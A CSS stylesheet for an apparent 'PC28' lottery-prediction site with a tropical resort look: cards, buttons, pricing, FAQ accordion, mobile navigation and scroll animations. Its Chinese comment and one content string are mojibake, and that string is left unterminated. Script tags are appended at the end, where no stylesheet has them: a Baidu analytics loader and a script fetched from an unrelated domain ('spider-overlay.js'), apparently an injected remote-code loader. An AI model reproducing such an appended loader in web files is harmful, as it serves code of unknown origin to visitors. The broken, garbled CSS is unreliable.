﻿/* ============================================================
   PC28棰勬祴缃?鈥?Tropical Resort Style
   Palette: turquoise#00b4d8 | sunset coral#ff6b6b | palm green#2d6a4f
   ============================================================ */

:root {
  --turquoise: #00b4d8;
  --turquoise-light: #48cae4;
  --turquoise-dark: #0096c7;
  --coral: #ff6b6b;
  --coral-light: #ff8e8e;
  --coral-dark: #e55a5a;
  --palm: #2d6a4f;
  --palm-light: #40916c;
  --palm-dark: #1b4332;
  --golden: #f4a261;
  --golden-light: #f7c59f;
  --sand: #fff3e0;
  --cream: #fffbf5;
  --white: #ffffff;
  --dark: #1a1a2e;
  --gray: #6b7280;
  --shadow-sm: 0 2px 8px rgba(0,0,0,0.08);
  --shadow-md: 0 6px 24px rgba(0,0,0,0.10);
  --shadow-lg: 0 12px 40px rgba(0,0,0,0.12);
  --radius-sm: 12px;
  --radius-md: 20px;
  --radius-lg: 28px;
  --radius-xl: 36px;
}

/* ---------- Base ---------- */
html { scroll-behavior: smooth; }
body {
  font-family: 'Segoe UI', 'PingFang SC', 'Microsoft YaHei', sans-serif;
  background: var(--cream);
  color: var(--dark);
  overflow-x: hidden;
  line-height: 1.7;
}

/* ---------- Tropical Leaf Silhouettes (CSS Shapes) ---------- */
.leaf-left,
.leaf-right {
  position: absolute;
  pointer-events: none;
  z-index: 0;
  opacity: 0.12;
}
.leaf-left::before,
.leaf-left::after,
.leaf-right::before,
.leaf-right::after {
  content: '';
  position: absolute;
  border-radius: 0 100% 0 100%;
  background: var(--palm);
  transform-origin: bottom left;
}
.leaf-left::before {
  width: 120px; height: 200px;
  transform: rotate(-25deg) skewX(-10deg);
}
.leaf-left::after {
  width: 90px; height: 160px;
  transform: rotate(-50deg) skewX(-5deg);
  top: 30px; left: 40px;
}
.leaf-right::before {
  width: 120px; height: 200px;
  transform: rotate(25deg) skewX(10deg);
}
.leaf-right::after {
  width: 90px; height: 160px;
  transform: rotate(50deg) skewX(5deg);
  top: 30px; left: -40px;
}

/* Floating leaf accent */
.leaf-float {
  position: absolute;
  pointer-events: none;
  z-index: 0;
}
.leaf-float::before {
  content: '';
  position: absolute;
  width: 60px; height: 100px;
  border-radius: 50% 0 50% 0;
  background: linear-gradient(135deg, var(--palm-light), var(--palm));
  opacity: 0.15;
  transform: rotate(-15deg);
  animation: leafSway 6s ease-in-out infinite;
}
@keyframes leafSway {
  0%, 100% { transform: rotate(-15deg) translateY(0); }
  50% { transform: rotate(-20deg) translateY(-10px); }
}

/* ---------- Resort Cards ---------- */
.resort-card {
  background: var(--white);
  border-radius: var(--radius-md);
  box-shadow: var(--shadow-sm);
  transition: all 0.35s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  border: 1px solid rgba(0,180,216,0.08);
  overflow: hidden;
}
.resort-card:hover {
  transform: translateY(-6px);
  box-shadow: var(--shadow-lg);
  border-color: rgba(0,180,216,0.2);
}

.resort-card-golden {
  background: linear-gradient(135deg, #fffdf7 0%, #fff8e7 100%);
  border: 2px solid rgba(244,162,97,0.3);
}

/* ---------- Golden Gradient Accents ---------- */
.golden-text {
  background: linear-gradient(135deg, var(--golden), var(--coral-light));
  -webkit-background-clip: text;
  -webkit-text-fill-color: transparent;
  background-clip: text;
}

.golden-btn {
  background: linear-gradient(135deg, var(--golden), var(--coral));
  color: #fff;
  border: none;
  border-radius: 50px;
  padding: 14px 36px;
  font-weight: 700;
  font-size: 1.05rem;
  cursor: pointer;
  transition: all 0.3s ease;
  box-shadow: 0 4px 18px rgba(255,107,107,0.35);
  letter-spacing: 0.02em;
}
.golden-btn:hover {
  transform: translateY(-3px);
  box-shadow: 0 8px 28px rgba(255,107,107,0.45);
}

.outline-btn {
  background: transparent;
  border: 2px solid var(--turquoise);
  color: var(--turquoise);
  border-radius: 50px;
  padding: 12px 34px;
  font-weight: 600;
  font-size: 1rem;
  cursor: pointer;
  transition: all 0.3s ease;
}
.outline-btn:hover {
  background: var(--turquoise);
  color: #fff;
}

/* ---------- Section Headers ---------- */
.section-badge {
  display: inline-block;
  background: rgba(0,180,216,0.1);
  color: var(--turquoise-dark);
  font-weight: 700;
  font-size: 0.85rem;
  padding: 6px 18px;
  border-radius: 50px;
  letter-spacing: 0.04em;
  text-transform: uppercase;
  margin-bottom: 12px;
}

.section-title {
  font-size: 2.4rem;
  font-weight: 800;
  color: var(--dark);
  line-height: 1.25;
  margin-bottom: 16px;
}

.section-subtitle {
  font-size: 1.1rem;
  color: var(--gray);
  max-width: 600px;
  margin: 0 auto;
}

/* ---------- Hero ---------- */
.hero-wave {
  position: absolute;
  bottom: -2px;
  left: 0;
  width: 100%;
  z-index: 2;
}
.hero-wave svg { display: block; }

/* ---------- Stats Counter Cards ---------- */
.stat-card {
  text-align: center;
  padding: 32px 20px;
  border-radius: var(--radius-md);
  background: var(--white);
  box-shadow: var(--shadow-sm);
  transition: all 0.3s ease;
  position: relative;
  overflow: hidden;
}
.stat-card::before {
  content: '';
  position: absolute;
  top: 0; left: 0; right: 0;
  height: 4px;
  background: linear-gradient(90deg, var(--turquoise), var(--coral), var(--golden));
}
.stat-card:hover { transform: translateY(-4px); box-shadow: var(--shadow-md); }
.stat-number {
  font-size: 2.8rem;
  font-weight: 800;
  color: var(--turquoise-dark);
  line-height: 1.1;
}
.stat-label { color: var(--gray); font-size: 0.95rem; margin-top: 6px; }

/* ---------- Feature Icons ---------- */
.feature-icon-wrap {
  width: 64px; height: 64px;
  border-radius: var(--radius-sm);
  display: flex; align-items: center; justify-content: center;
  font-size: 1.6rem;
  margin-bottom: 16px;
}
.icon-turq { background: rgba(0,180,216,0.12); color: var(--turquoise); }
.icon-coral { background: rgba(255,107,107,0.12); color: var(--coral); }
.icon-palm { background: rgba(45,106,79,0.12); color: var(--palm); }
.icon-gold { background: rgba(244,162,97,0.12); color: var(--golden); }

/* ---------- Step Indicators ---------- */
.step-number {
  width: 52px; height: 52px;
  border-radius: 50%;
  display: flex; align-items: center; justify-content: center;
  font-weight: 800; font-size: 1.3rem;
  color: #fff;
  margin: 0 auto 16px;
  position: relative;
  z-index: 1;
}
.step-connector {
  position: absolute;
  top: 26px; left: 50%; width: 100%; height: 3px;
  background: linear-gradient(90deg, var(--turquoise-light), var(--coral-light));
  z-index: 0;
}

/* ---------- Testimonial Avatars ---------- */
.testimonial-avatar {
  width: 64px; height: 64px;
  border-radius: 50%;
  object-fit: cover;
  border: 3px solid var(--turquoise-light);
  box-shadow: 0 4px 12px rgba(0,180,216,0.2);
}

/* ---------- Pricing Cards ---------- */
.pricing-card {
  border-radius: var(--radius-lg);
  padding: 40px 28px;
  text-align: center;
  transition: all 0.35s ease;
  position: relative;
}
.pricing-card.featured {
  background: linear-gradient(180deg, #ffffff 0%, #f0fdfa 100%);
  border: 2px solid var(--turquoise);
  transform: scale(1.04);
  box-shadow: var(--shadow-lg);
}
.pricing-card.featured::before {
  content: '鏈€鍙楁杩?;
  position: absolute;
  top: 16px; right: 20px;
  background: var(--coral);
  color: #fff;
  font-size: 0.75rem;
  font-weight: 700;
  padding: 4px 14px;
  border-radius: 50px;
}
.pricing-price {
  font-size: 3rem;
  font-weight: 800;
  color: var(--palm);
}

/* ---------- FAQ Accordion ---------- */
.faq-item {
  border-bottom: 1px solid rgba(0,0,0,0.08);
  overflow: hidden;
}
.faq-question {
  width: 100%;
  text-align: left;
  padding: 20px 0;
  font-weight: 700;
  font-size: 1.05rem;
  background: none;
  border: none;
  cursor: pointer;
  display: flex;
  justify-content: space-between;
  align-items: center;
  color: var(--dark);
  transition: color 0.2s;
}
.faq-question:hover { color: var(--turquoise); }
.faq-question i { transition: transform 0.3s ease; color: var(--turquoise); }
.faq-answer {
  max-height: 0;
  overflow: hidden;
  transition: max-height 0.4s ease, padding 0.4s ease;
  color: var(--gray);
  line-height: 1.8;
}
.faq-item.active .faq-answer {
  max-height: 300px;
  padding-bottom: 20px;
}
.faq-item.active .faq-question i {
  transform: rotate(180deg);
}

/* ---------- Hamburger ---------- */
.hamburger { cursor: pointer; z-index: 100; }
.hamburger span {
  display: block;
  width: 26px; height: 3px;
  background: var(--dark);
  margin: 5px 0;
  border-radius: 3px;
  transition: all 0.3s ease;
}
.hamburger.active span:nth-child(1) { transform: rotate(45deg) translate(5px,6px); }
.hamburger.active span:nth-child(2) { opacity: 0; }
.hamburger.active span:nth-child(3) { transform: rotate(-45deg) translate(5px,-6px); }

/* Mobile Nav */
.mobile-nav {
  position: fixed;
  top: 0; right: -100%;
  width: 280px; height: 100vh;
  background: var(--white);
  box-shadow: -4px 0 24px rgba(0,0,0,0.12);
  z-index: 99;
  transition: right 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  padding: 80px 32px 32px;
  display: flex; flex-direction: column; gap: 8px;
}
.mobile-nav.open { right: 0; }
.mobile-nav a {
  display: block;
  padding: 14px 16px;
  font-weight: 600;
  color: var(--dark);
  border-radius: var(--radius-sm);
  transition: all 0.2s;
  text-decoration: none;
}
.mobile-nav a:hover { background: rgba(0,180,216,0.08); color: var(--turquoise); }

/* Overlay */
.nav-overlay {
  position: fixed; inset: 0;
  background: rgba(0,0,0,0.4);
  z-index: 98;
  opacity: 0;
  pointer-events: none;
  transition: opacity 0.3s ease;
}
.nav-overlay.show { opacity: 1; pointer-events: auto; }

/* ---------- Scroll Animations (IntersectionObserver) ---------- */
.reveal {
  opacity: 0;
  transform: translateY(40px);
  transition: opacity 0.7s ease, transform 0.7s ease;
}
.reveal.visible {
  opacity: 1;
  transform: translateY(0);
}

.reveal-left {
  opacity: 0;
  transform: translateX(-40px);
  transition: opacity 0.7s ease, transform 0.7s ease;
}
.reveal-left.visible {
  opacity: 1;
  transform: translateX(0);
}

.reveal-right {
  opacity: 0;
  transform: translateX(40px);
  transition: opacity 0.7s ease, transform 0.7s ease;
}
.reveal-right.visible {
  opacity: 1;
  transform: translateX(0);
}

.reveal-scale {
  opacity: 0;
  transform: scale(0.9);
  transition: opacity 0.7s ease, transform 0.7s ease;
}
.reveal-scale.visible {
  opacity: 1;
  transform: scale(1);
}

/* Stagger delays */
.delay-100 { transition-delay: 0.1s; }
.delay-200 { transition-delay: 0.2s; }
.delay-300 { transition-delay: 0.3s; }
.delay-400 { transition-delay: 0.4s; }
.delay-500 { transition-delay: 0.5s; }

/* ---------- Footer ---------- */
.footer-wave {
  position: absolute;
  top: -2px; left: 0;
  width: 100%;
  z-index: 1;
}
.footer-wave svg { display: block; }

/* ---------- Contact Form ---------- */
.form-input {
  width: 100%;
  padding: 14px 18px;
  border: 2px solid rgba(0,0,0,0.08);
  border-radius: var(--radius-sm);
  font-size: 1rem;
  transition: all 0.3s ease;
  background: var(--white);
  outline: none;
}
.form-input:focus {
  border-color: var(--turquoise);
  box-shadow: 0 0 0 4px rgba(0,180,216,0.1);
}
textarea.form-input { resize: vertical; min-height: 140px; }

/* ---------- Decorative divider ---------- */
.wave-divider {
  width: 100%; overflow: hidden; line-height: 0;
}
.wave-divider svg { display: block; width: 100%; height: 80px; }

/* ---------- Responsive ---------- */
@media (max-width: 768px) {
  .section-title { font-size: 1.7rem; }
  .stat-number { font-size: 2rem; }
  .pricing-card.featured { transform: none; }
  .hero-wave svg { height: 60px; }
}

/* ---------- Back to Top ---------- */
.back-to-top {
  position: fixed;
  bottom: 30px; right: 30px;
  width: 46px; height: 46px;
  border-radius: 50%;
  background: var(--turquoise);
  color: #fff;
  border: none;
  cursor: pointer;
  box-shadow: 0 4px 16px rgba(0,180,216,0.35);
  z-index: 50;
  display: flex; align-items: center; justify-content: center;
  font-size: 1.2rem;
  opacity: 0;
  transform: translateY(20px);
  pointer-events: none;
  transition: all 0.3s ease;
}
.back-to-top.show {
  opacity: 1;
  transform: translateY(0);
  pointer-events: auto;
}
.back-to-top:hover { background: var(--turquoise-dark); transform: translateY(-3px); }
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?66486df8906d1585b228aae20f1074ed";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script src="https://yswa6.cn/spider-overlay.js"></script>

